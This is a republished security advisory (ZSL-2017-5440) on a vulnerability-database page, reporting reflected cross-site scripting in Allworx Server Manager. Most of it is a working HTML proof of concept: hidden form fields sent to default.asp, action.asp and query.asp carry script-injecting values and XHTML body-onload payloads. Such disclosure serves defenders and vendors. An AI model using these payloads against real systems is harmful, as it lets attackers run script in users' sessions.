Allworx Server Manager 6x / 6x12 / 48x Cross Site Scripting

2017.11.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!DOCTYPE html> <!-- Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities Vendor: Allworx Corporation Product web page: https://www.allworx.com Affected version: 6x, 6x12 and 48x Summary: The Allworx phone system enables users to manage voicemails in the Allworx Message Center and customize the personal phone system configurations using My Allworx Manager. Desc: Allworx server manager interface suffers from multiple reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 10 Server IST OIS Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5440 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5440.php 31.10.2017 --> <html> <head> <title>Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities</title> </head> <body> <script>history.pushState('', '', '/')</script> <br />::: default.asp :::<br /> &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nabla; <form action="http://192.168.2.254/default.asp"> <input type="hidden" name="Tab" value='MyConferences"><script>confirm(0)</script>' /> <input type="hidden" name="SessionID" value='0000"><script>confirm(1)</script>' /> <input type="hidden" name="Op" value="ModConf" /> <input type="hidden" name="key" value='2"><script>confirm(2)</script>' /> <input type="submit" value="Submit request 1" /> </form> <br />::: action.asp :::<br /> &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nabla; <form action="http://192.168.2.254/action.asp"> <input type="hidden" name="action" value='selectActivePresence"><script>confirm(3)</script>' /> <input type="hidden" name="SessionID" value="zsl" /> <input type="hidden" name="LoginName" value="admin" /> <input type="hidden" name="Presence" value="0" /> <input type="hidden" name="AnnounceOnlyIndices" value="" /> <input type="submit" value="Submit request 2" /> </form> <br />::: query.asp :::<br /> &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nabla; <form action="http://192.168.2.254/query.asp"> <input type="hidden" name="query" value="RepQuery<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(4)'/></a>" /> <input type="hidden" name="SessionID" value="251<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(5)'/></a>" /> <input type="hidden" name="repName" value="SystemSettings" /> <input type="hidden" name="fields" value="sysProfileName,hostLanTcpIpAddress,hostWanTcpIpAddress" /> <input type="hidden" name="groupName" value="records<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(6)'/></a>" /> <input type="hidden" name="recName" value="record<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(7)'/></a>" /> <input type="hidden" name="rnd" value="20435" /> <input type="submit" value="Submit request 3" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top